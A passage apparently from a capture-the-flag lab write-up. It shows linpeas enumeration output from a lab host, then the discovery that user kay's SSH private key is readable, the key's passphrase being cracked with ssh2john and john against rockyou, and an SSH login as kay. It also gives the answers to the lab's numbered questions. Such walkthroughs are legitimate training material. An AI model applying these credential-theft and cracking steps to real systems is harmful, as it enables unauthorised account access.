/var/lib/lxcfs/cgroup/memory/system.slice/systemd-update-utmp.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-user-sessions.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/system-getty.slice/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/system-serial\x2dgetty.slice/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/tomcat.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/ufw.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/unattended-upgrades.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/var-lib-lxcfs.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/user.slice/cgroup.event_control
/var/lib/lxcfs/cgroup/name=systemd/user.slice/user-1001.slice/user@1001.service
/var/lib/lxcfs/cgroup/name=systemd/user.slice/user-1001.slice/user@1001.service/cgroup.procs
/var/lib/lxcfs/cgroup/name=systemd/user.slice/user-1001.slice/user@1001.service/init.scope
/var/lib/lxcfs/cgroup/name=systemd/user.slice/user-1001.slice/user@1001.service/init.scope/cgroup.clone_children
/var/lib/lxcfs/cgroup/name=systemd/user.slice/user-1001.slice/user@1001.service/init.scope/cgroup.procs
/var/lib/lxcfs/cgroup/name=systemd/user.slice/user-1001.slice/user@1001.service/init.scope/notify_on_release
/var/lib/lxcfs/cgroup/name=systemd/user.slice/user-1001.slice/user@1001.service/init.scope/tasks
/var/lib/lxcfs/cgroup/name=systemd/user.slice/user-1001.slice/user@1001.service/tasks
/var/spool/samba
/var/tmp
/dev/mqueue/linpeas.txt
[+] Searching passwords in config PHP files
[+] Finding IPs inside logs (limit 100)
9 /var/log/dpkg.log:2.29.4.2
9 /var/log/dpkg.log:2.16.04.2
8 /var/log/dpkg.log:0.16.04.4
8 /var/log/apt/history.log:0.16.04.2
8 /var/log/apt/history.log:0.16.04.13
80 /var/log/dpkg.log:1.16.04.1
78 /var/log/dpkg.log:0.16.04.13
77 /var/log/dpkg.log:0.16.04.2
6 /var/log/apt/history.log:4.4.0.87
6 /var/log/apt/history.log:1.16.04.3
5 /var/log/apt/history.log:0.16.04.3
4 /var/log/wtmp:192.168.56.101
4 /var/log/installer/status:1.2.3.3
4 /var/log/installer/status:0.16.04.1
40 /var/log/dpkg.log:1.16.04.3
3 /var/log/apt/history.log:4.4.0.119
3 /var/log/apt/history.log:2.16.04.1
3 /var/log/apt/history.log:1.16.04.4
3 /var/log/apt/history.log:1.16.04.2
39 /var/log/dpkg.log:4.4.0.87
38 /var/log/dpkg.log:0.16.04.3
2 /var/log/wtmp:10.8.32.129
2 /var/log/bootstrap.log:0.99.7.1
2 /var/log/apt/history.log:3.16.04.1
2 /var/log/apt/history.log:0.96.20.7
25 /var/log/dpkg.log:1.16.04.2
24 /var/log/dpkg.log:1.16.04.4
21 /var/log/dpkg.log:4.4.0.119
21 /var/log/dpkg.log:2.16.04.1
20 /var/log/dpkg.log:3.16.04.1
1 /var/log/lastlog:192.168.56.102
1 /var/log/lastlog:10.8.32.129
1 /var/log/installer/status:2.21.63.3
1 /var/log/bootstrap.log:0.5.5.1
1 /var/log/apt/history.log:6.16.04.1
1 /var/log/apt/history.log:3.16.04.3
1 /var/log/apt/history.log:2.29.4.2
1 /var/log/apt/history.log:2.16.04.2
1 /var/log/apt/history.log:0.16.04.4
18 /var/log/apt/history.log:0.16.04.1
17 /var/log/dpkg.log:0.96.20.7
15 /var/log/dpkg.log:3.16.04.3
14 /var/log/wtmp:192.168.56.102
138 /var/log/dpkg.log:0.16.04.1
10 /var/log/dpkg.log:6.16.04.1
10 /var/log/apt/history.log:1.16.04.1
[+] Finding passwords inside logs (limit 100)
/var/log/bootstrap.log: base-passwd depends on libc6 (>= 2.8); however:
/var/log/bootstrap.log: base-passwd depends on libdebconfclient0 (>= 0.145); however:
/var/log/bootstrap.log:dpkg: base-passwd: dependency problems, but configuring anyway as you requested:
/var/log/bootstrap.log:Preparing to unpack .../base-passwd_3.5.39_amd64.deb ...
/var/log/bootstrap.log:Preparing to unpack .../passwd_1%3a4.2-3.1ubuntu5_amd64.deb ...
/var/log/bootstrap.log:Selecting previously unselected package base-passwd.
/var/log/bootstrap.log:Selecting previously unselected package passwd.
/var/log/bootstrap.log:Setting up base-passwd (3.5.39) ...
/var/log/bootstrap.log:Setting up passwd (1:4.2-3.1ubuntu5) ...
/var/log/bootstrap.log:Shadow passwords are now on.
/var/log/bootstrap.log:Unpacking base-passwd (3.5.39) ...
/var/log/bootstrap.log:Unpacking base-passwd (3.5.39) over (3.5.39) ...
/var/log/bootstrap.log:Unpacking passwd (1:4.2-3.1ubuntu5) ...
/var/log/dpkg.log:2017-08-01 11:16:21 configure base-passwd:amd64 3.5.39 3.5.39
/var/log/dpkg.log:2017-08-01 11:16:21 install base-passwd:amd64 <none> 3.5.39
/var/log/dpkg.log:2017-08-01 11:16:21 status half-configured base-passwd:amd64 3.5.39
/var/log/dpkg.log:2017-08-01 11:16:21 status half-installed base-passwd:amd64 3.5.39
/var/log/dpkg.log:2017-08-01 11:16:21 status installed base-passwd:amd64 3.5.39
/var/log/dpkg.log:2017-08-01 11:16:21 status unpacked base-passwd:amd64 3.5.39
/var/log/dpkg.log:2017-08-01 11:16:23 status half-configured base-passwd:amd64 3.5.39
/var/log/dpkg.log:2017-08-01 11:16:23 status half-installed base-passwd:amd64 3.5.39
/var/log/dpkg.log:2017-08-01 11:16:23 status unpacked base-passwd:amd64 3.5.39
/var/log/dpkg.log:2017-08-01 11:16:23 upgrade base-passwd:amd64 3.5.39 3.5.39
/var/log/dpkg.log:2017-08-01 11:16:28 install passwd:amd64 <none> 1:4.2-3.1ubuntu5
/var/log/dpkg.log:2017-08-01 11:16:28 status half-installed passwd:amd64 1:4.2-3.1ubuntu5
/var/log/dpkg.log:2017-08-01 11:16:28 status unpacked passwd:amd64 1:4.2-3.1ubuntu5
/var/log/dpkg.log:2017-08-01 11:16:31 configure base-passwd:amd64 3.5.39 <none>
/var/log/dpkg.log:2017-08-01 11:16:31 status half-configured base-passwd:amd64 3.5.39
/var/log/dpkg.log:2017-08-01 11:16:31 status installed base-passwd:amd64 3.5.39
/var/log/dpkg.log:2017-08-01 11:16:31 status unpacked base-passwd:amd64 3.5.39
/var/log/dpkg.log:2017-08-01 11:16:37 configure passwd:amd64 1:4.2-3.1ubuntu5 <none>
/var/log/dpkg.log:2017-08-01 11:16:37 status half-configured passwd:amd64 1:4.2-3.1ubuntu5
/var/log/dpkg.log:2017-08-01 11:16:37 status installed passwd:amd64 1:4.2-3.1ubuntu5
/var/log/dpkg.log:2017-08-01 11:16:37 status unpacked passwd:amd64 1:4.2-3.1ubuntu5
/var/log/dpkg.log:2017-08-01 11:17:35 status half-configured passwd:amd64 1:4.2-3.1ubuntu5
/var/log/dpkg.log:2017-08-01 11:17:35 status half-installed passwd:amd64 1:4.2-3.1ubuntu5
/var/log/dpkg.log:2017-08-01 11:17:35 status unpacked passwd:amd64 1:4.2-3.1ubuntu5
/var/log/dpkg.log:2017-08-01 11:17:35 status unpacked passwd:amd64 1:4.2-3.1ubuntu5.3
/var/log/dpkg.log:2017-08-01 11:17:35 upgrade passwd:amd64 1:4.2-3.1ubuntu5 1:4.2-3.1ubuntu5.3
/var/log/dpkg.log:2017-08-01 11:17:36 configure passwd:amd64 1:4.2-3.1ubuntu5.3 <none>
/var/log/dpkg.log:2017-08-01 11:17:36 status half-configured passwd:amd64 1:4.2-3.1ubuntu5.3
/var/log/dpkg.log:2017-08-01 11:17:36 status installed passwd:amd64 1:4.2-3.1ubuntu5.3
/var/log/dpkg.log:2017-08-01 11:17:36 status unpacked passwd:amd64 1:4.2-3.1ubuntu5.3
/var/log/installer/status:Description: Set up users and passwords
[+] Finding emails inside logs (limit 100)
4 /var/log/bootstrap.log:ftpmaster@ubuntu.com
17 /var/log/installer/status:kernel-team@lists.ubuntu.com
58 /var/log/installer/status:ubuntu-devel-discuss@lists.ubuntu.com
28 /var/log/installer/status:ubuntu-installer@lists.ubuntu.com
[+] Finding *password* or *credential* files in home
[+] Finding 'pwd' or 'passw' string inside /home, /var/www, /etc, /root and list possible web(/var/www) and config(/etc) passwords
/home/kay/.ssh/authorized_keys
/home/kay/.ssh/id_rsa
/home/kay/.ssh/id_rsa.pub
/var/www/html/development/j.txt
/etc/apache2/sites-available/default-ssl.conf: # file needs this password: `xxj31ZMTZzkVA'.
/etc/apache2/sites-available/default-ssl.conf: # Note that no password is obtained from the user. Every entry in the user
/etc/apparmor.d/abstractions/authentication: # databases containing passwords, PAM configuration files, PAM libraries
/etc/debconf.conf:Accept-Type: password
/etc/debconf.conf:Filename: /var/cache/debconf/passwords.dat
/etc/debconf.conf:Name: passwords
/etc/debconf.conf:Reject-Type: password
/etc/debconf.conf:Stack: config, passwords
/etc/samba/smb.conf.bak:; add user script = /usr/sbin/adduser --quiet --disabled-password --gecos "" %u
/etc/samba/smb.conf.bak: pam password change = yes
/etc/samba/smb.conf.bak: passwd chat = *Enter\snew\s*\spassword:* %n\n *Retype\snew\s*\spassword:* %n\n *password\supdated\ssuccessfully* .
/etc/samba/smb.conf.bak: unix password sync = yes
/etc/ssh/sshd_config:PermitEmptyPasswords no
/etc/ssh/sshd_config:PermitRootLogin prohibit-password
The ssh key /home/kay/.ssh/id_rsa is readable by us, so we can login as kay user.
$ ssh2john kay_rsa > kay_rsa.hash
$ john kay_rsa.hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
******* (kay_rsa)
1g 0:00:00:00 DONE (2023-04-30 15:29) 14.28g/s 1181Kp/s 1181Kc/s 1181KC/s behlat..bball40
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
# Question 9 - What is the name of the other user you found(all lower case)?
The answer is kay.
# Question 10 - If you have found another user, what can you do with this information?
No answer needed.
# Question 11 - What is the final password you obtain?
$ ssh kay@10.10.131.121 -i kay_rsa
Enter passphrase for key 'kay_rsa':
kay@basic2:~$ cat pass.bak
The answer is inside the file pass.bak